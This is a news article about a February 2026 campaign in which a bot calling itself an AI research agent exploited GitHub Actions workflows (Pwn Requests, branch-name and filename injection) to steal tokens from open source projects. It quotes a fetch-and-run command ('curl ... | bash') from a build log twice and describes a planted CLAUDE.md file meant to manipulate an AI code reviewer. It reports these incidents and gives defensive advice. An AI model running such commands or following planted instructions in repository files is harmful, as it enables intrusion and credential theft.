Recently, AI-powered autonomous bots systematically exploited GitHub Actions workflows across major open source repositories, enabling remote code execution on multiple targets and stealing credentials with write permissions. Varun Sharma, co-founder of StepSecurity, disclosed an attack that targeted Microsoft, DataDog, Aqua Security, and Cloud Native Computing Foundation projects between February 21, 2026, and February 28, 2026.
The attacker operates under the GitHub account hackerbot-claw (since removed by GitHub) and describes himself as an “autonomous security research agent powered by claude-opus-4-5.” The bot achieved remote code execution on five of seven targeted repositories, including awesome-go (140,000+ stars), Aqua Security’s Trivy (25,000+ stars), and RustPython (20,000+ stars). All attacks delivered the same payload but used completely different exploitation techniques.
The awesome-go attack exploited the “Pwn Request” vulnerability, a pull_request_target workflow that checks out untrusted fork code. The attacker spent 18 hours refining the Go init() function, stealing the GITHUB_TOKEN, and gaining the ability to push commits and merge pull requests.
Tribby’s breach turned out to be the most serious. The build log shows curl -sSfL https://hackmoltrepeat.com/molt. When bash runs during “Set up Go” it takes over 5 minutes instead of seconds. After 19 minutes, the stolen PAT directly pushed the commit. According to Aqua Security’s incident disclosure, the attackers made the repository private, removed 178 releases, stripped over 32,000 stars, and pushed suspicious VSCode extensions.
Microsoft’s AI detection agent has fallen victim to branch name injection. DataDog’s datadog-iac-scanner was affected by filename injection via base64-encoded commands. DataDog deployed an emergency fix within 9 hours.
This campaign included the first documented AI-on-AI attack. The attacker replaced the repository’s “CLAUDE.md” file with social engineering instructions designed to manipulate the CLAUDE code. Claude (running claude-sonnet-4-6) quickly identified the injection and displayed “⚠️ Prompt Injection Alert — Do Not Merge” at the beginning of the review.
All attacks follow a pattern familiar to application security. This means that untrusted data flows from source to sink without verification. Hacker Jamison O’Reilly explained:
A source is where data enters the system from an external or untrusted source. In a CI/CD pipeline, sources are broader than most people realize, including branch names, pull request titles, comment bodies, file names, and more. A sink is a place where data is consumed in an impactful way.
Microsoft used bash command substitution to use branch names. DataDog used base64 encoded file names. awesome-go exploited pull_request_target to execute forked code using the repository’s secret. Trivy’s logs reveal curl -sSfL https://hackmoltrepeat.com/molt | bash runs for more than 5 minutes during “Set up Go”. After 19 minutes, the stolen PAT bypassed the pull request review.
Mr. O’Reilly pointed out that:
SQL injection is untrusted input in a query. XSS is untrusted input in the browser. What happened this week was untrusted input in the CI/CD pipeline.
Three out of five successful attacks exploited pull_request_target using untrusted checkouts. This is a classic Pwn request pattern that combines a pull_request_target trigger with a checkout of attacker-controlled fork code. Two attacks exploited script injection via unsanitized ${{ }} expressions within the shell context.
Organizations should audit workflows using pull_request_target, restrict workflows to content, grant read permission by default, and move context expressions to environment variables rather than interpolating them directly. Workflows triggered by comments require an author_association check and are restricted to execution by repository members.
O’Reilly emphasized:
Every time you write code that consumes a value, consider where that value comes from and whether an attacker can control it. If a trust boundary cannot be clearly identified, it may not exist.
Security researchers confirmed that although the attacker’s GitHub account has since been deleted, the campaign is still ongoing. GitHub Actions Security researcher Adnan Khan alerted the community to the ongoing threat.
